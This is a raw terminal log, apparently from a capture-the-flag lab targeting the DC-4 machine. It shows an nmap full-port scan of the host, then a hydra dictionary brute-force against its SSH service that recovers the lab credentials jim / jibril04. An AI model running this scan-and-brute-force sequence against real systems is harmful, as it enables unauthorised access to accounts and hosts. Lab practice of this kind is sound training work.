hack@kali:~$ nmap -A -p- 192.168.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-04 12:20 CEST
Nmap scan report for dc-4.homenet.telecomitalia.it (192.168.1.15)
Host is up (0.00091s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)                                  
80/tcp open  http    nginx 1.15.10                                                                 
|_http-server-header: nginx/1.15.10                                                                
|_http-title: System Tools                                                                         
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                            
                                                                                                   
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .     
Nmap done: 1 IP address (1 host up) scanned in 12.63 seconds   

hack@kali:~/CTF/DC_4$ hydra -L user.txt -P pass.txt ssh://192.168.1.15                             
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.                                                                       
                                                                                                   
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-04 12:49:42                 
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4                                                                                 
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore                                        
[DATA] max 16 tasks per 1 server, overall 16 tasks, 759 login tries (l:3/p:253), ~48 tries per task
[DATA] attacking ssh://192.168.1.15:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 583 to do in 00:04h, 16 active
[STATUS] 128.33 tries/min, 385 tries in 00:03h, 377 to do in 00:03h, 16 active
[22][ssh] host: 192.168.1.15   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-04 12:55:53




 
